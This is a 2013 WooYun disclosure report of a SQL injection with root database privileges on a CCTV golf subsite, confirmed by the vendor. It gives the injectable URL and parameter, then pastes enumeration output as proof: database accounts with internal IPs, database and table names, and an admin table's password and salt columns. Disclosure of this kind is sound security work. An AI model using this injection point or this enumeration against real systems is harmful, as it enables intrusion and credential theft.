当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-046276

漏洞标题:CCTV#分站SQL注入一枚(root权限)

相关厂商:中国网络电视台

漏洞作者: he2des

提交时间:2013-12-18 10:56

修复时间:2014-02-01 10:56

公开时间:2014-02-01 10:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-18: 细节已通知厂商并且等待厂商处理中
2013-12-18: 厂商已经确认,细节仅向厂商公开
2013-12-28: 细节向核心白帽子及相关领域专家公开
2014-01-07: 细节向普通白帽子公开
2014-01-17: 细节向实习白帽子公开
2014-02-01: 细节向公众公开

简要描述:

涉及信息比较多~

详细说明:

#1:注入点一枚
http://golf.cctv.com/court1209/court.php?do=terminal&domain=list&type=1&id=319
ROOT权限,可以跨裤查询~

QQ图片20131217202822.jpg


漏洞证明:

#1:漏洞证明

[*] 'admin'@'111.67.205.54'
[*] 'nagios'@'%'
[*] 'repl'@'220.181.168.117'
[*] 'root'@'127.0.0.1'
[*] 'root'@'211.103.213.26'
[*] 'root'@'220.181.168.112'
[*] 'root'@'220.181.168.114'
[*] 'root'@'220.181.168.116'
[*] 'root'@'220.181.168.119'
[*] 'root'@'localhost'
[*] 'scorecourt'@'220.181.168.116'
[*] 'shuqi888'@'%'
[*] 'test'@'220.181.168.112'
[*] 'test'@'220.181.168.114'
[*] 'test'@'220.181.168.116'


dbs

available databases [18]:
[*] club
[*] dev_1
[*] ecms_bj
[*] fungolf
[*] fungolf_bak
[*] fungolf_new
[*] gold_court
[*] goldcourse
[*] golftravel
[*] information_schema
[*] matchnews_sys_dev
[*] mysql
[*] photo_golf
[*] ppframe
[*] sns
[*] sns_t
[*] t
[*] test


Database: ecms_bj
[151 tables]
+-------------------------------+
| phome_ecms_article |
| phome_ecms_article_data_1 |
| phome_ecms_article_doc |
| phome_ecms_article_doc_data |
| phome_ecms_download |
| phome_ecms_download_data_1 |
| phome_ecms_download_doc |
| phome_ecms_download_doc_data |
| phome_ecms_flash |
| phome_ecms_flash_data_1 |
| phome_ecms_flash_doc |
| phome_ecms_flash_doc_data |
| phome_ecms_info |
| phome_ecms_info_data_1 |
| phome_ecms_info_doc |
| phome_ecms_info_doc_data |
| phome_ecms_infoclass_article |
| phome_ecms_infoclass_download |
| phome_ecms_infoclass_flash |
| phome_ecms_infoclass_info |
| phome_ecms_infoclass_movie |
| phome_ecms_infoclass_news |
| phome_ecms_infoclass_photo |
| phome_ecms_infoclass_shop |
| phome_ecms_infotmp_article |
| phome_ecms_infotmp_download |
| phome_ecms_infotmp_flash |
| phome_ecms_infotmp_info |
| phome_ecms_infotmp_movie |
| phome_ecms_infotmp_news |
| phome_ecms_infotmp_photo |
| phome_ecms_infotmp_shop |
| phome_ecms_movie |
| phome_ecms_movie_data_1 |
| phome_ecms_movie_doc |
| phome_ecms_movie_doc_data |
| phome_ecms_news |
| phome_ecms_news_data_1 |
| phome_ecms_news_doc |
| phome_ecms_news_doc_data |
| phome_ecms_photo |
| phome_ecms_photo_data_1 |
| phome_ecms_photo_doc |
| phome_ecms_photo_doc_data |
| phome_ecms_shop |
| phome_ecms_shop_data_1 |
| phome_ecms_shop_doc |
| phome_ecms_shop_doc_data |
| phome_enewsad |
| phome_enewsadclass |
| phome_enewsadminstyle |
| phome_enewsbefrom |
| phome_enewsbq |
| phome_enewsbqclass |
| phome_enewsbqtemp |
| phome_enewsbqtempclass |
| phome_enewsbuybak |
| phome_enewsbuygroup |
| phome_enewscard |
| phome_enewschecktext |
| phome_enewsclass |
| phome_enewsclassadd |
| phome_enewsclasstemp |
| phome_enewsclasstempclass |
| phome_enewsdiggips |
| phome_enewsdo |
| phome_enewsdolog |
| phome_enewsdownerror |
| phome_enewsdownrecord |
| phome_enewsdownurlqz |
| phome_enewserrorclass |
| phome_enewsf |
| phome_enewsfava |
| phome_enewsfavaclass |
| phome_enewsfeedback |
| phome_enewsfeedbackclass |
| phome_enewsfeedbackf |
| phome_enewsfile |
| phome_enewsgbook |
| phome_enewsgbookclass |
| phome_enewsgfenip |
| phome_enewsgroup |
| phome_enewshy |
| phome_enewshyclass |
| phome_enewsinfoclass |
| phome_enewsinfotype |
| phome_enewsinfovote |
| phome_enewsjstemp |
| phome_enewsjstempclass |
| phome_enewskey |
| phome_enewslink |
| phome_enewslinkclass |
| phome_enewslinktmp |
| phome_enewslisttemp |
| phome_enewslisttempclass |
| phome_enewslog |
| phome_enewsloginfail |
| phome_enewsmember |
| phome_enewsmemberadd |
| phome_enewsmemberf |
| phome_enewsmemberfeedback |
| phome_enewsmemberform |
| phome_enewsmembergbook |
| phome_enewsmembergroup |
| phome_enewsmod |
| phome_enewsnewstemp |
| phome_enewsnewstempclass |
| phome_enewsnotcj |
| phome_enewspage |
| phome_enewspageclass |
| phome_enewspayapi |
| phome_enewspayrecord |
| phome_enewspic |
| phome_enewspicclass |
| phome_enewspl |
| phome_enewspl_data_1 |
| phome_enewsplayer |
| phome_enewsplf |
| phome_enewspltemp |
| phome_enewspostdata |
| phome_enewspublic |
| phome_enewspubtemp |
| phome_enewsqf |
| phome_enewsqmsg |
| phome_enewssearch |
| phome_enewssearchall |
| phome_enewssearchall_load |
| phome_enewssearchtemp |
| phome_enewssearchtempclass |
| phome_enewsshopdd |
| phome_enewsshoppayfs |
| phome_enewsshopps |
| phome_enewsspacestyle |
| phome_enewssql |
| phome_enewstable |
| phome_enewstask |
| phome_enewstempgroup |
| phome_enewstempvar |
| phome_enewstempvarclass |
| phome_enewstogzts |
| phome_enewsuser |
| phome_enewsuserjs |
| phome_enewsuserlist |
| phome_enewsvote |
| phome_enewsvotemod |
| phome_enewsvotetemp |
| phome_enewswapstyle |
| phome_enewswords |
| phome_enewswriter |
| phome_enewszt |
| phome_enewsztclass |
+-------------------------------+

Database: ecms_bj
Table: phome_enewsuser
[15 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| adminclass | mediumtext |
| checked | tinyint(1) |
| email | varchar(120) |
| filelevel | tinyint(1) |
| groupid | smallint(6) |
| lastip | varchar(20) |
| lasttime | int(11) |
| loginnum | int(11) |
| password | varchar(32) |
| rnd | varchar(20) |
| salt | varchar(8) |
| styleid | smallint(6) |
| truename | varchar(20) |
| userid | int(11) |
| username | varchar(30) |
+------------+--------------+


QQ图片20131217201155.jpg


QQ图片20131217202249.jpg


QQ图片20131217202559.jpg

修复方案:

过滤亲,

版权声明:转载请注明来源 he2des@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-12-18 16:08

厂商回复:

非常感谢,我们将尽快进行该业务的整改!~~感谢您对我们的支持和帮助!~~~

最新状态:

暂无